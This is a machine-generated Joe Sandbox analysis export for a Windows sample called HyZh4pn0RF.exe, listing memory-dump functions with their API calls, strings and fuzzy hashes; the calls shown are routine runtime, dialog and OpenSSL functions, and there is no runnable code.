Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction ID: 6b500d8196353301fe43f7662d45bd5be6b89c27de926eaab9a143e9c2ff31b9
Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction Fuzzy Hash: 5091B032B0868685F761AA25D460BFDB6A1BB40B94FE44137DA6D473E5EE3CE841C720

Function 00007FF78F4A05A8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A0887

Part of subcall function 00007FF78F4A69C4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A69E1

Strings

UTF-16LEUNICODE, xrefs: 00007FF78F4A0825
ccs, xrefs: 00007FF78F4A07C2
UTF-8, xrefs: 00007FF78F4A0806

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
Instruction ID: 7d9d4377f6224eb2cd70672c133ff035116e2c66cdcb563b51a5773e15621456
Opcode Fuzzy Hash: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
Instruction Fuzzy Hash: B581A576E0A28285F7647F2F81502F8B6A0BB11B88FF54037CA0D57297DA3DE941DB61

Function 00007FF78F48EFD8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF78F48F024
_CallSETranslator.LIBVCRUNTIME ref: 00007FF78F48F073

Strings

MOC, xrefs: 00007FF78F48F038
RCC, xrefs: 00007FF78F48F041

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
Instruction ID: c2edce990b409cb921ebead7a04f76362098b38416ff335d44372d6e73dbab39
Opcode Fuzzy Hash: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
Instruction Fuzzy Hash: 57618B33A18B858AE710AF65D4403EDBBA0FB48B98F644226EF4D17B99DF38E445C710

Function 00007FF78F48F334 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF78F48F35C
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF78F48F444

Strings

csm, xrefs: 00007FF78F48F37E
csm, xrefs: 00007FF78F48F496

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
Instruction ID: fca32cdfd6f0477c6c1c19bcbfddce0d52b3fc5170aa9b173d01d209206b64ab
Opcode Fuzzy Hash: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
Instruction Fuzzy Hash: 0051C4729282C286EB74AF1594443B8B7A0FB54BA4FA44137DA9C47BD6CF3CE491C710

Function 00007FF78F482890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78F488AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488B1A

MessageBoxW.USER32 ref: 00007FF78F48299B
MessageBoxA.USER32 ref: 00007FF78F4829B7

Strings

Fatal error detected, xrefs: 00007FF78F482971, 00007FF78F4829A9
%s%s: %s, xrefs: 00007FF78F482916

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 1878133881-2410924014
Opcode ID: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
Instruction ID: 7e17de5979a10d38e1ebc60977257c16ce1728f5fe54cc8bc816aafd288b8576
Opcode Fuzzy Hash: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
Instruction Fuzzy Hash: 29314272638AC191E620EB11E4516EAA3A4FF847C4FE04137EA8D47A99DF3CD749CB50

Function 00007FF78F483EC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,00007FF78F4839EA), ref: 00007FF78F483EF1

Part of subcall function 00007FF78F4829E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF78F4887F2,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F482A14
Part of subcall function 00007FF78F4829E0: MessageBoxW.USER32 ref: 00007FF78F482AF0

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF78F483F2A
GetModuleFileNameW, xrefs: 00007FF78F483F02
Failed to get executable path., xrefs: 00007FF78F483EFB

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ErrorFileLastMessageModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
API String ID: 2581892565-1977442011
Opcode ID: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
Instruction ID: 6f6f90f0f448e17875f2da14ae9c97277b0fe268de36952de3dbb1dd3327dcb5
Opcode Fuzzy Hash: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
Instruction Fuzzy Hash: 31017131B3E6C244FA60B765E8553F69291BF5C784FE00437E94D87292EE1CE209C720

Function 00007FF78F49CB60 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF78F49CBDF
WriteFile.KERNEL32 ref: 00007FF78F49CEA7
WriteFile.KERNEL32 ref: 00007FF78F49CEED
GetLastError.KERNEL32 ref: 00007FF78F49CFA3

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
Instruction ID: 37f11bff6435397977a72d10ea920e23e99348e21692b2c86dd33bc4ced2177b
Opcode Fuzzy Hash: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
Instruction Fuzzy Hash: 68D1D172B18A8289E710DF65D4406ECB7B1FB44798BA44236DF5D97BE9EE38D406C310

Function 00007FF78F482330 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF78F482364
SetWindowLongPtrW.USER32 ref: 00007FF78F482386
GetWindowLongPtrW.USER32 ref: 00007FF78F4823B0
InvalidateRect.USER32 ref: 00007FF78F4823D0

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction ID: fcacf94c22708ca62206b79f60b6ecf0a9374f0b58d89f051879ea38de02c425
Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction Fuzzy Hash: 4411A931E285C282F654A77AF5542F99291FF85B81FE48032EA4D07B9DCE7CD6C5C620

Function 00007FF78F4A628C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78F4A1DD0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A1E03

_get_daylight.LIBCMT ref: 00007FF78F4A63A4
_get_daylight.LIBCMT ref: 00007FF78F4A63B5

Strings

?, xrefs: 00007FF78F4A6335

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
Instruction ID: 8174b47a5d51ec8d9f0fd78c45a99338307426805615aa363cfe97fe20b73ee2
Opcode Fuzzy Hash: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
Instruction Fuzzy Hash: B341F632B196C246FB20AB26E4457B99660FF907A4FB44236EF5D07AD9EE3CD442C710

Function 00007FF78F4995A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4995D6

Part of subcall function 00007FF78F49AF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF22
Part of subcall function 00007FF78F49AF0C: GetLastError.KERNEL32(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF2C

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF78F48BFE5), ref: 00007FF78F4995F4

Strings

C:\Users\user\Desktop\HyZh4pn0RF.exe, xrefs: 00007FF78F4995E2

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\HyZh4pn0RF.exe
API String ID: 3580290477-891532016
Opcode ID: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
Instruction ID: 95cfef40d6c0f7798d9e92d9db5130c43ce1d404f151c24588b498a93feefa6d
Opcode Fuzzy Hash: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
Instruction Fuzzy Hash: 18416E32B0979286EB54FF2594408F9A794FB847D4BA44037EA4E47BA5DF3DE881C320

Function 00007FF78F49D1F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF78F49D30F
GetLastError.KERNEL32 ref: 00007FF78F49D331

Strings

U, xrefs: 00007FF78F49D2BB

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
Instruction ID: 429de10f4068c4e8a0f8bad83eac5b0146fdf536650867590c9ca0745da381b3
Opcode Fuzzy Hash: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
Instruction Fuzzy Hash: 6941D232B19A8185EB20AF65E4447E9E7A0FB88790FE04036EE8D87799DF3DD445C720

Function 00007FF78F49F918 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF78F49F958
GetCurrentDirectoryW.KERNEL32 ref: 00007FF78F49F9AA

Strings

:, xrefs: 00007FF78F49F96E

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 37476e9fe501e7f44791a553affc3ffa80e4bc938821bb0c9fc6a7376d994417
Instruction ID: 4a2e2682559d4e9ccd5d347fa16834cd518ef4a9c8f383193f4636803c6da4b9
Opcode Fuzzy Hash: 37476e9fe501e7f44791a553affc3ffa80e4bc938821bb0c9fc6a7376d994417
Instruction Fuzzy Hash: 3621F372B186C181EB20AB15D0496BEB3B1FB84B48FE18037DA9D43298DF7CE945C761

Function 00007FF78F482C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78F488AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488B1A

MessageBoxW.USER32 ref: 00007FF78F482D25
MessageBoxA.USER32 ref: 00007FF78F482D41

Strings

Error detected, xrefs: 00007FF78F482CFB, 00007FF78F482D33

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error detected
API String ID: 1878133881-3513342764
Opcode ID: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
Instruction ID: 598cfd93b13dd052d77aeb280c79e2add988f72d11923f3de8499e236d7878c1
Opcode Fuzzy Hash: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
Instruction Fuzzy Hash: B1215672638AC591E720EB11F4916EAA364FF84784FE05137E64D47A65DF3CD215C720

Function 00007FF78F482B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78F488AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488B1A

MessageBoxW.USER32 ref: 00007FF78F482C05
MessageBoxA.USER32 ref: 00007FF78F482C21

Strings

Fatal error detected, xrefs: 00007FF78F482BDB, 00007FF78F482C13

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Fatal error detected
API String ID: 1878133881-4025702859
Opcode ID: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
Instruction ID: 140f4f445ee296a450d3f88c176e32a817e4ec169da7cf4e47d3afe5395afbe0
Opcode Fuzzy Hash: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
Instruction Fuzzy Hash: 46214472638AC591E720AB11E4516EAA364FF84784FE05136E64D47A69DF3CD319CB20

Function 00007FF78F48FE80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF78F48FED0
RaiseException.KERNEL32 ref: 00007FF78F48FF11

Strings

csm, xrefs: 00007FF78F48FEFE

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
Instruction ID: d2de07ed9c72f60b733f8bc60a293e7a8901bc47a87646868300cee661097eb7
Opcode Fuzzy Hash: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
Instruction Fuzzy Hash: 0E116D32A28B8182EB609F15F4402A9B7E0FB88B94FA84236DECC47759DF3CC551CB00

Function 00007FF78F4A041C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A044C
GetDriveTypeW.KERNEL32 ref: 00007FF78F4A048C

Strings

:, xrefs: 00007FF78F4A0475

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
Instruction ID: d132aecf7ec6a0c049a8db696612c92101502acbc41b79e065371d2a90daa673
Opcode Fuzzy Hash: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
Instruction Fuzzy Hash: AB014471A1D28686FB60BF6594612FEA3A0FF88705FE40037D54D47696DF3CE584CA24

Analysis Process: HyZh4pn0RF.exePID: 4040, Parent PID: 344COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6%
Total number of Nodes:	744
Total number of Limit Nodes:	66

Executed Functions

Function 00007FFBAB755770 Relevance: 65.6, APIs: 34, Strings: 3, Instructions: 827COMMON

Download Yara Rule

APIs

EVP_MD_CTX_get0_md.LIBCRYPTO-3 ref: 00007FFBAB75592A
EVP_MD_CTX_get0_md.LIBCRYPTO-3 ref: 00007FFBAB75593B
EVP_MD_get_size.LIBCRYPTO-3 ref: 00007FFBAB755943
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB755950
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB755968
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB755A1E
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB755A36
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB755B22
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB755B3A
EVP_CIPHER_CTX_get0_cipher.LIBCRYPTO-3 ref: 00007FFBAB755C8E
EVP_CIPHER_get_mode.LIBCRYPTO-3 ref: 00007FFBAB755C96
EVP_CIPHER_CTX_get_iv_length.LIBCRYPTO-3 ref: 00007FFBAB755CA5
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB755CAE
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB755CC6
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB755CD6
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB756451
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB756462
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB75647C
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB756488
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB756494
